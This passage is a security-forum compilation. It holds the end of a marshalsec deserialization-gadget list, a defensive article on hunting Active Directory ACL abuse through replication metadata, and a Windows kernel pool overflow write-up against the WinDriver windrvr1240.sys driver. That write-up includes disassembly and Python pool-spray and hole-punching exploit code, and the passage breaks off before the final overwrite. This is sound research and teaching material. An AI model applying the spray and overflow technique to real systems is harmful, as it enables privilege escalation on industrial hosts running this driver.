Jackson: possible JDK only RCE, various third party RCEs
Java: yet another third party RCE
JsonIO: JDK only RCE
JYAML: JDK only RCE
Kryo: third party RCEs
KryoAltStrategy: JDK only RCE
Red5AMF(0|3): JDK only RCE
SnakeYAML: JDK only RCEs
XStream: JDK only RCEs
YAMLBeans: third party RCE

Sursa: https://github.com/mbechler/marshalsec
  19. Hunting With Active Directory Replication Metadata

Will | Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.io | Sep 6

With the recent release of BloodHound's ACL Attack Path Update as well as the work on Active Directory DACL backdooring by @_wald0 and myself (whitepaper here), I started to investigate ACL-based attack paths from a defensive perspective. Sean Metcalf has done some great work concerning Active Directory threat hunting (see his 2017 BSides Charm "Detecting the Elusive: Active Directory Threat Hunting" presentation) and I wanted to show how replication metadata can help in detecting this type of malicious activity.

Also, after this post had been drafted, Grégory LUCAND pointed out to me the extensive article (in French) he authored on the same subject area titled "Metadata de réplication et analyse Forensic Active Directory (fr-FR)". He walks through detecting changes to an OU, as well as an excellent deep dive (deeper than this article) into how some of the replication components work such as linked value replication. I highly recommend you check his post out, even if you have to use Google Translate as I did :)

I'll dive into some background concerning domain replication metadata and then will break down each ACL attack primitive and how you can hunt for these modifications. Unfortunately, replication metadata can be a bit limited, but it can at least help us narrow down the modification event that took place as well as the domain controller the event occurred on.

Note: all examples here use my test domain which runs at a Windows 2012 R2 domain functional level. Other functional domain versions will vary. Also, all examples were done in a lab context, so exact behavior in a real network will vary as well.

Active Directory Replication Metadata

When a change is made to a domain object on a domain controller in Active Directory, those changes are replicated to other domain controllers in the same domain (see the "Directory Replication" section here). As part of the replication process, metadata about the replication is preserved in two constructed attributes, that is, attributes where the end value is calculated from other attributes. These two properties are msDS-ReplAttributeMetaData and msDS-ReplValueMetaData.

Sidenote: previous work I found on replication metadata includes this article on tracking UPN modification as well as this great series of articles on different use cases for this data. These articles show how to use both REPADMIN /showobjmeta as well as the Active Directory cmdlets to enumerate and parse the XML formatted data returned. A few months ago, I pushed a PowerView commit that simplifies this enumeration process, and I'll demonstrate these new functions throughout this post.

msDS-ReplAttributeMetaData

First off, how do we know which attributes are replicated? Object attributes are themselves represented in the forest schema and include a systemFlags attribute that contains various meta-settings. This includes the FLAG_ATTR_NOT_REPLICATED flag, which indicates that the given attribute should not be replicated.
We can use PowerView to quickly enumerate all of these non-replicated attributes using a bitwise LDAP filter to check for this flag:

Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname

If we want attributes that ARE replicated, we can just negate the bitwise filter:

Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(!systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname

So changes to any of the attributes in the above set on an object are replicated to other domain controllers, and, therefore, have replication metadata information in msDS-ReplAttributeMetaData (except for linked attributes, more on that shortly). Since this is a constructed attribute, we have to specify that the property be calculated during our LDAP search. Luckily, you can already do this with PowerView by specifying -Properties msDS-ReplAttributeMetaData for any of the Get-Domain* functions:

You can see that we get an array of XML text blobs that describe the modification events. PowerView's brand new Get-DomainObjectAttributeHistory function will automatically query msDS-ReplAttributeMetaData for one or more objects and parse out the XML blobs into custom PSObjects:

Breaking down each result, we have the distinguished name of the object itself, the name of the replicated attribute, the last time the attribute was changed (LastOriginatingChange), the number of times the attribute has changed (Version), and the directory service agent distinguished name the change originated from (LastOriginatingDsaDN). The "Sidenote: Resolving LastOriginatingDsaDN" section at the end of this post shows how to resolve this distinguished name to the appropriate domain controller object itself. Unfortunately, we don't get who made the change, or what the previous attribute value was; however, there are still a few interesting things we can do with this data which I'll show in a bit.

msDS-ReplValueMetaData

In order to understand msDS-ReplValueMetaData and why it's separate from msDS-ReplAttributeMetaData, you need to understand linked attributes in Active Directory. Introduced in Windows Server 2003 domain functional levels, linked value replication "allows individual values of a multivalued attribute to be replicated separately." In English: attributes that are constructed/depend on other attributes were broken out in such a way that bits of the whole could be replicated one by one, instead of the entire grouping all at once. This was introduced in order to cut down on replication traffic in modern domain environments.

With linked attributes, Active Directory calculates the value of a given attribute, referred to as the back link, from the value of another attribute, referred to as the forward link. The best example of this is member / memberof for group memberships: the member property of a group is the forward link while the memberof property of a user is the backward link. When you enumerate the memberof property for a user, the backlinks are crawled to produce the final membership set.

There are two additional caveats about forward/backward links you should be aware of. First, forward links are writable, while backlinks are not, so when a forward-linked attribute is changed the value of the associated backlink property is updated automatically.
Second, because of this, only forward-linked attributes are replicated between domains, which then automatically calculate the backlinks. For more information, check out this great post on the subject. A huge advantage for us is that because forward-linked attributes are replicated in this way, the previous values of these attributes are stored in replication metadata. This is exactly what the msDS-ReplValueMetaData constructed attribute stores, again in XML format. The new Get-DomainObjectLinkedAttributeHistory PowerView function wraps this all up for you: We now know that member/memberof is a linked set, hence the modification results to member above. In order to enumerate all forward-linked attributes, we can again examine the forest schema. Linked properties have a Link and LinkID in the schema — forward links have an even/nonzero value while back links have an odd/nonzero value. We can grab the current schema with [DirectoryServices.ActiveDirectory.ActiveDirectorySchema]::GetCurrentSchema() and can then use the FindAllClasses() method to enumerate all the current schema classes. If we filter by class properties that are even, we can find all linked properties that therefore have their previous values replicated in Active Directory metadata. There are a lot of results here, but the main ones we likely care about are member/memberOf and manager/directReports, unfortunately. So member and manager are the only interesting properties for an object we can track previous modification values on. However, like with msDS-ReplAttributeMetaData, we unfortunately can’t see who actually initiated the change. Hunting With Replication Metadata Alright, so we have a bunch of this seemingly random replication metadata, how the hell do we actually use this to “find bad?” Metadata won’t magically tell you an entire story, but I believe it can start to point you in the right direction, with the added bonus of being pre-existing functionality already present in your domain. I’ll break down the process for hunting for each ACL attack primitive that @_wald0 and myself covered, but for most situations the process will be: Use Active Directory replication metadata to detect changes to object properties that might indicate malicious behavior. Collect detailed event logs from the domain controller linked to the change (as indicated by the metadata) in order to track down who performed the modification and what the value was changed to. There’s one small exception to this process: Group Membership Modification This one is the easiest. The control relationship for this is the right to add members to a group (WriteProperty to Self-Membership) and the attack primitive through PowerView is Add-DomainGroupMember. Let’s see what the information from Get-DomainObjectLinkedAttributeHistory can tell us: In the first entry, we see that ‘EvilUser’ was originally added (TimeCreated) at 21:13 and is still present (TimeDeleted == the epoch). Version being 3 means that the EvilUser was originally added at TimeCreated, deleted at some point, and then readded at 17:53 (LastOriginatingChange). Big note: these timestamps are in UTC! In the second example, TestOUUser was added to the group at 21:12 (TimeCreated) and removed at 21:19 (TimeDeleted). The Version being even, as well as the non-epoch TimeDeleted value, means that this user is no longer present in the group and was removed at the indicated time. 
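As an aside, nothing here is PowerView-specific: the same constructed attribute can be pulled with any LDAP client and the XML blobs parsed by hand. A rough Python/ldap3 sketch of that idea follows; the hostname, credentials, and group name are placeholder assumptions, and the blob is parsed generically rather than assuming exact field names:

import xml.etree.ElementTree as ET
from ldap3 import Server, Connection, SUBTREE

# Placeholder connection details for a test domain.
conn = Connection(Server('dc.testlab.local'),
                  user='TESTLAB\\hunter', password='Password123!',
                  auto_bind=True)

# msDS-ReplValueMetaData is constructed, so it must be requested explicitly.
conn.search('DC=testlab,DC=local', '(samAccountName=TestGroup)',
            search_scope=SUBTREE,
            attributes=['distinguishedName', 'msDS-ReplValueMetaData'])

for entry in conn.entries:
    for blob in entry['msDS-ReplValueMetaData']:
        # Each value is one XML document describing a single linked value
        # (for groups: one member), including created/deleted times and version.
        node = ET.fromstring(str(blob).replace('\x00', '').strip())
        for field in node:
            print(field.tag, '=', field.text)
        print('-' * 40)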
PowerView’s last new function, Get-DomainGroupMemberDeleted, will return just metadata components indicating deleted users: If we want more details, we have the Directory System Agent (DSA) where the change originated, meaning the domain controller in this environment that handled the modification (PRIMARY here). Since we have the group that was modified (TestGroup) and the approximate time the change occurred (21:44 UTC), we can go to the domain controller that initiated the change (PRIMARY) to pull more event log detail (see the “Sidenote: Resolving LastOriginatingDsaDN” section for more detail on this process). The auditing we really want isn’t on by default, but can be enabled with “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Account Management -> Audit Security Group Management”: This will result in event log IDs of 4735/4737/4755 for modifications to domain local, global, and universally scoped security groups: We can see in the event detail that TESTLAB\dfm.a is the principal who initiated the change, with correlates with the deletion event we observed in the replication metadata. User Service Principal Name Modification This is also another interesting case. The vast majority of users will never have a service principal name (SPN) set unless the account is registered to… run a service. SPN modification is an attack primitive that I’ve spoken about before, and grants us a great opportunity to take advantage of the “Version” field of the metadata, i.e. the number of times a property has been modified. If we set and then unset a SPN on a user, the Version associated with the attribute metadata will be even, indicating there used to be a value set: If we enable the “Audit User Account Management” and “Audit Computer Account Management” settings, we can grab more detailed information about the changes: The event ID will be 4738, but the event log detail unfortunately does not break out the value of servicePrincipalName on change. However, we do again get the principal who initiated the change: Note the logged timestamp of the event matches the LastOriginatingChange of the replication metadata. If we wanted to do a mass enumeration of EVERY user account that had a SPN set and then deleted, we can use -LDAPFilter ‘(samAccountType=805306368)’ -Properties servicePrincipalName, and filtering out anything with an odd Version: Object Owner/DACL Modification I originally thought this scenario would be tough as well, as I had guessed that whenever delegation is changed on an OU those new rights were reflected in the ntSecurityDescriptor of any user objects down the inheritance chain. However, I was mistaken- any delegation changes are in the ntSecurityDescriptor of the OU/container, and I believe those inherited rights are calculated on LDAP enumeration by the server. In other words, the ntSecurityDescriptor of user/group/computer objects should only change when the owner is explicitly changed, or a new ACE is manually added to that object. Since an object’s DACL and owner are both stored in ntSecurityDescriptor, and the event log data doesn’t provide details on the previous/changed value, we have no way of knowing if it was a DACL or owner based changed. However, we can still figure out who initiated the change again using event 4738: Just like with SPNs, we can also sweep for any users (or other objects) that had their DACL or owner changed (i.e. 
Version > 1):

If we periodically enumerate all of this data for all users/other objects, we can start to timeline and calculate change deltas, but that's for another post :)

User Password Reset

Unfortunately, this is probably the hardest scenario. Since password changes/resets are a fairly common occurrence, it's difficult to reliably pull a pattern out of the data based solely on the password last set time. Luckily however, enabling the "Audit User Account Management" policy also produces event 4723 (a user changed their own password) and event 4724 (a password reset was initiated):

And we get the time of the reset, the user that was force-reset, and the principal that initiated it!

Group Policy Object Editing

If you're able to track down a malicious GPO edit, and want to know the systems/users affected, I've talked about that process as well. However, this section will focus on trying to identify what file was edited and by whom. Every time a GPO is modified, the versionNumber property is increased. So if we pull the attribute metadata concerning the last time versionNumber was modified, and correlate this time (as a range) with edits to all files and folders in the SYSVOL path, we can identify the files that were likely modified by the last edit to the GPO. Here's how we might accomplish that:

You can see above that the Groups.xml group policy preferences file was likely the file edited. To identify what user made the changes, we need to tweak "Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> DS Access -> Audit Active Directory Service Changes":

We can then comb for event IDs of 5136 and use the alert data to narrow down the event that caused the versionNumber modification:

We see the distinguishedName of the GPO object being modified, as well as who initiated the change. There is some more information here in case you're interested.

Sidenote: Resolving LastOriginatingDsaDN

As I previously mentioned, the LastOriginatingDsaDN property indicates the last directory service agent that the given change originated from. For us to make the most use of this information, we want to map this particular DSA record back to the domain controller it's running on. This is unfortunately a multi-step process, but I'll walk you through it below using PowerView.

Say the change we want to track back is the following deleted Domain Admin member:

We see that the DSA distinguished name exists in the CN=Configuration container of the associated domain. We can retrieve the full object this references by using PowerView's Get-DomainObject with the -SearchBase set to "ldap://CN=Configuration,DC=testlab,DC=local":

We see above that this has an NTDS-DSA object category, and we see a serverreferencebl (backlink) property that points us in the right direction. If we resolve this new object DN, we get the following:

Now we see the actual domain controller distinguished name linked in the msdfsr-computerreference property of this new result, and the serverreference matches the LastOriginatingDsaDN from our initial result. This means we can skip that middle step and query for this ms-DFSR-Member object directly, linked by the serverreference attribute, by way of a custom LDAP filter. To finish, we can extract the msdfsr-computerreference property and resolve it to the actual domain controller object:

Success!
\m/ Wrapup Hopefully this causes at least a few people to think about the hunting/forensic possibilities from the Active Directory side. There’s a wealth of opportunity here to detect our ACL based attack components, as well as a myriad of other Active Directory “bad”. Also, observant readers may have noticed that I ignored an entire defensive component here, system access control lists (SACLs), which provide that chance to implement additional auditing. I’ll cover SACLs in a future post, showing how to utilize BloodHound to identify “key terrain” to place very specific SACL auditing rules. Until then, have fun! Originally published at harmj0y. Sursa: https://posts.specterops.io/hunting-with-active-directory-replication-metadata-1dab2f681b19
  20. Sharks in the Pool :: Mixed Object Exploitation in the Windows Kernel Pool

Sep 6, 2017

This year at Blackhat, I attended the Advanced Windows Exploitation (AWE) class. It's a hands-on class teaching Windows exploitation and whilst I'm relatively versed in usermode exploitation, I needed to get up to speed on windows kernel exploitation. If you haven't taken the class, I encourage you to!

TL;DR I explain a basic kernel pool overflow vulnerability and how you can exploit it by overwriting the TypeIndex after spraying the kernel pool with a mix of kernel objects.

Introduction

So, after taking the AWE course I really wanted to find and exploit a few kernel vulnerabilities. Whilst I think the HackSys Extreme Vulnerable Driver (HEVD) is a great learning tool, for me, it doesn't work. I have always enjoyed finding and exploiting vulnerabilities in real applications as they present a hurdle that is often not so obvious. Since taking the course, I have been very slowly (methodically, almost insanely) developing a windows kernel device driver fuzzer. Using this private fuzzer (eta wen publik jelbrek?), I found the vulnerability presented in this post. The technique demonstrated for exploitation is nothing new, but its slight variation allows an attacker to basically exploit any pool size. This blog post is mostly a reference for myself, but hopefully it benefits someone else attempting pool exploitation for the first time.

The vulnerability

After testing a few SCADA products, I came across a third party component called "WinDriver". After a short investigation I realized this is Jungo's DriverWizard WinDriver. This product is bundled and shipped in several SCADA applications, often with an old version too. After installation, it installs a device driver named windrvr1240.sys to the standard windows driver folder. With some basic reverse engineering, I found several ioctl codes that I plugged directly into my fuzzer's config file.

{
    "ioctls_range":{
        "start": "0x95380000",
        "end": "0x9538ffff"
    }
}

Then, I enabled special pool using verifier /volatile /flags 0x1 /adddriver windrvr1240.sys and ran my fuzzer for a little bit, eventually finding several exploitable vulnerabilities. In particular, this one stood out:

kd> .trap 0xffffffffc800f96c
ErrCode = 00000002
eax=e4e4e4e4 ebx=8df44ba8 ecx=8df45004 edx=805d2141 esi=f268d599 edi=00000088
eip=9ffbc9e5 esp=c800f9e0 ebp=c800f9ec iopl=0 nv up ei pl nz na pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207
windrvr1240+0x199e5:
9ffbc9e5 8941fc          mov     dword ptr [ecx-4],eax ds:0023:8df45000=????????
kd> dd esi+ecx-4
805d2599  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25a9  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25b9  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25c9  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25d9  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25e9  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25f9  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d2609  e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

That's user controlled data stored in [esi+ecx] and it's writing out-of-bounds of a kernel pool. Nice. On closer inspection, I noticed that this is actually a pool overflow triggered via an inline copy operation at loc_4199D8.
.text:0041998E sub_41998E proc near ; CODE XREF: sub_419B7C+3B2 .text:0041998E .text:0041998E arg_0 = dword ptr 8 .text:0041998E arg_4 = dword ptr 0Ch .text:0041998E .text:0041998E push ebp .text:0041998F mov ebp, esp .text:00419991 push ebx .text:00419992 mov ebx, [ebp+arg_4] .text:00419995 push esi .text:00419996 push edi .text:00419997 push 458h ; fized size_t +0x8 == 0x460 .text:0041999C xor edi, edi .text:0041999E push edi ; int .text:0041999F push ebx ; void * .text:004199A0 call memset ; memset our buffer before the overflow .text:004199A5 mov edx, [ebp+arg_0] ; this is the SystemBuffer .text:004199A8 add esp, 0Ch .text:004199AB mov eax, [edx] .text:004199AD mov [ebx], eax .text:004199AF mov eax, [edx+4] .text:004199B2 mov [ebx+4], eax .text:004199B5 mov eax, [edx+8] .text:004199B8 mov [ebx+8], eax .text:004199BB mov eax, [edx+10h] .text:004199BE mov [ebx+10h], eax .text:004199C1 mov eax, [edx+14h] .text:004199C4 mov [ebx+14h], eax .text:004199C7 mov eax, [edx+18h] ; read our controlled size from SystemBuffer .text:004199CA mov [ebx+18h], eax ; store it in the new kernel buffer .text:004199CD test eax, eax .text:004199CF jz short loc_4199ED .text:004199D1 mov esi, edx .text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write .text:004199D6 sub esi, ebx .text:004199D8 .text:004199D8 loc_4199D8: ; CODE XREF: sub_41998E+5D .text:004199D8 mov eax, [esi+ecx] ; load the first write value from the buffer .text:004199DB inc edi ; copy loop index .text:004199DC mov [ecx], eax ; first dword write .text:004199DE lea ecx, [ecx+8] ; set the index into our overflown buffer .text:004199E1 mov eax, [esi+ecx-4] ; load the second write value from the buffer .text:004199E5 mov [ecx-4], eax ; second dword write .text:004199E8 cmp edi, [ebx+18h] ; compare against our controlled size .text:004199EB jb short loc_4199D8 ; jump back into loop The copy loop actually copies 8 bytes for every iteration (a qword) and overflows a buffer of size 0x460 (0x458 + 0x8 byte header). The size of copy is directly attacker controlled from the input buffer (yep you read that right). No integer overflow, no stored in some obscure place, nada. We can see at 0x004199E8 that the size is attacker controlled from the +0x18 offset of the supplied buffer. Too easy! Exploitation Now comes the fun bit. A generic technique that can be used is the object TypeIndex overwrite which has been blogged on numerous occasions (see references) and is at least 6 years old, so I won’t go into too much detail. Basically the tl;dr; is that using any kernel object, you can overwrite the TypeIndex stored in the _OBJECT_HEADER. Some common objects that have been used in the past are the Event object (size 0x40) and the IoCompletionReserve object (size 0x60). Typical exploitation goes like this: Spray the pool with an object of size X, filling pages of memory. Make holes in the pages by freeing/releasing adjacent objects, triggering coalescing to match the target chunk size (in our case 0x460). Allocate and overflow the buffer, hopefully landing into a hole, smashing the next object’s _OBJECT_HEADER, thus, pwning the TypeIndex. For example, say if your overflowed buffer is size 0x200, you could allocate a whole bunch of Event objects, free 0x8 of them (0x40 * 0x8 == 0x200) and voilà, you have your hole where you can allocate and overflow. So, assuming that, we need a kernel object that is modulus with our pool size. The problem is, that doesn’t work with some sizes. 
For example our pool size is 0x460, so if we do: >>> 0x460 % 0x40 32 >>> 0x460 % 0x60 64 >>> We always have a remainder. This means we cannot craft a hole that will neatly fit our chunk, or can we? There are a few ways to solve it. One way was to search for a kernel object that is modulus with our target buffer size. I spent a little time doing this and found two other kernel objects: # 1 type = "Job" size = 0x168 windll.kernel32.CreateJobObjectW(None, None) # 2 type = "Timer" size = 0xc8 windll.kernel32.CreateWaitableTimerW(None, 0, None) However, those sizes were no use as they are not modulus with 0x460. After some time testing/playing around, I relized that we can do this: >>> 0x460 % 0xa0 0 >>> Great! So 0xa0 can be divided evenly into 0x460, but how do we get kernel objects of size 0xa0? Well if we combine the Event and the IoCompletionReserve objects (0x40 + 0x60 = 0xa0) then we can achieve it. The Spray def we_can_spray(): """ Spray the Kernel Pool with IoCompletionReserve and Event Objects. The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. These are allocated from the Nonpaged kernel pool. """ handles = [] IO_COMPLETION_OBJECT = 1 for i in range(0, 25000): handles.append(windll.kernel32.CreateEventA(0,0,0,0)) hHandle = HANDLE(0) handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) # could do with some better validation if len(handles) > 0: return True return False This function sprays 50,000 objects. 25,000 Event objects and 25,000 IoCompletionReserve objects. This looks quite pretty in windbg: kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Allocated) IoCo (Protected) <--- chunk first allocated in the page 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo 
(Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected) Creating Holes The ‘IoCo’ tag is representative of a IoCompletionReserve object and a ‘Even’ tag is representative of an Event object. Notice that our first chunks offset is 0x60, thats the offset we will start freeing from. So if we free groups of objects, that is, the IoCompletionReserve and the Event our calculation becomes: >>> "0x%x" % (0x7 * 0xa0) '0x460' >>> We will end up with the correct size. Let’s take a quick look at what it looks like if we free the next 7 IoCompletionReserve object’s only. 
kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Free) IoCo 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Free) IoCo 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Free) IoCo 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Free) IoCo 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Free) IoCo 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Free) IoCo 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Free) IoCo 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected) So we can see we have seperate freed chunks. But we want to coalesce them into a single 0x460 freed chunk. To achieve this, we need to set the offset for our chunks to 0x60 (The first pointing to 0xXXXXY060). 
bin = [] # object sizes CreateEvent_size = 0x40 IoCompletionReserve_size = 0x60 combined_size = CreateEvent_size + IoCompletionReserve_size # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object offset = IoCompletionReserve_size for i in range(offset, offset + (7 * combined_size), combined_size): try: # chunks need to be next to each other for the coalesce to take effect bin.append(khandlesd[obj + i]) bin.append(khandlesd[obj + i - IoCompletionReserve_size]) except KeyError: pass # make sure it's contiguously allocated memory if len(tuple(bin)) == 14: holes.append(tuple(bin)) # make the holes to fill for hole in holes: for handle in hole: kernel32.CloseHandle(handle) Now, when we run the freeing function, we punch holes into the pool and get a freed chunk of our target size. kd> !pool 8674e000 Pool page 8674e000 region is Nonpaged pool *8674e000 size: 460 previous size: 0 (Free) *Io <-- 0x460 chunk is free Pooltag Io : general IO allocations, Binary : nt!io 8674e460 size: 60 previous size: 460 (Allocated) IoCo (Protected) 8674e4c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e500 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e560 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e5a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e600 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e640 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e6a0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e6e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e740 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e780 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e7e0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e820 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e880 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e8c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e920 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e960 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e9c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ea00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ea60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eaa0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eb00 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eb40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eba0 size: 40 previous size: 60 